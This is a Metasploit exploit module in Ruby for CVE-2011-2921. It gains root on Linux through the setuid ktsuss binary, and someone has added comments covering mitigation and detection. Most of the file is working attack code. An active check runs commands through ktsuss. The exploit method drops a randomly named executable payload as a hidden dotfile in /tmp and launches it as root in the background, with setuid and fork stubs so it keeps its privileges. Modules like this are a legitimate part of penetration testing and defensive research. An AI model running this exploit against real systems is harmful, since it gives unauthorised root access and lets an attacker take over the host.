GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
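# Local privilege escalation via the setuid-root ktsuss binary (CVE-2011-2921,
# ktsuss 1.4 and prior): ktsuss runs a user-supplied command without dropping
# privileges, so the command it launches executes as root.
#
# Defender notes (derived from what this module does):
# - Mitigation: upgrade ktsuss beyond the affected versions or remove the setuid
#   bit from the binary; see the GLSA reference below.
# - Detection: execution of the setuid ktsuss binary with `-u <user>` and an
#   argument pointing at a freshly created, executable dotfile in a
#   world-writable directory (default /tmp) is the footprint of both `check`
#   and `exploit` below. Note that `check` is an active check and also runs
#   the binary (see the comment on `check`).
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # @param info [Hash] module info passed by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ktsuss suid Privilege Escalation',
        'Description' => %q{
          This module attempts to gain root privileges by exploiting
          a vulnerability in ktsuss versions 1.4 and prior.

          The ktsuss executable is setuid root and does not drop
          privileges prior to executing user specified commands,
          resulting in command execution with root privileges.

          This module has been tested successfully on:

          ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
          ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'John Lightsey', # Discovery and exploit
          'bcoles' # Metasploit
        ],
        'DisclosureDate' => '2011-08-13',
        'References' => [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
        'Platform' => ['linux'],
        'Arch' => [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Targets' => [['Auto', {}]],
        # The generated ELF payload gets set*uid/set*gid stubs prepended and is
        # forked, so the backgrounded child keeps the privileges ktsuss hands it
        # while the `cmd_exec` call in `exploit` can return.
        'DefaultOptions' => {
          'AppendExit' => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid' => true,
          'PrependSetuid' => true,
          'PrependFork' => true
        },
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        },
        'DefaultTarget' => 0
      )
    )
    register_options [
      # Fix: the description previously read "Path to staprun executable"
      # (copied from another module); this option is the ktsuss binary path.
      OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # @return [String] path to the ktsuss binary on the target (KTSUSS_PATH option)
  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  # @return [String] directory the payload is written to (WritableDir option)
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Writes +data+ to +path+ on the target, replacing any existing file, and
  # registers the file with FileDropper so it is removed on cleanup.
  #
  # @param path [String] destination path on the target
  # @param data [String] file contents
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Uploads +data+ to +path+ (see #upload) and marks it executable.
  #
  # @param path [String] destination path on the target
  # @param data [String] file contents
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  # Vulnerability check.
  #
  # This is an *active* check: after confirming the binary exists and is
  # setuid, it runs `id` through ktsuss as the current user and looks for
  # `uid=0` in the output. That executes the setuid binary on the target
  # (visible in process accounting / audit logs); it is not a passive version
  # lookup. AutoCheck runs this before `exploit` unless overridden.
  #
  # @return [CheckCode] Safe or Vulnerable
  def check
    return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path
    return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path

    vprint_good "#{ktsuss_path} is setuid"

    # Username comes from the target's own `whoami`; it is interpolated
    # unquoted into the command line below.
    id = cmd_exec 'whoami'
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Drops the payload into WritableDir and runs it through ktsuss.
  #
  # Refuses to run when the session is already root unless ForceExploit is set,
  # and when WritableDir is not writable. The payload is written as a random
  # dotfile, registered for cleanup by #upload, and launched in the background
  # (`& echo`) so the command returns while the forked payload keeps running.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on the BadConfig conditions above
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    id = cmd_exec 'whoami'
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
    vprint_line res
  end
end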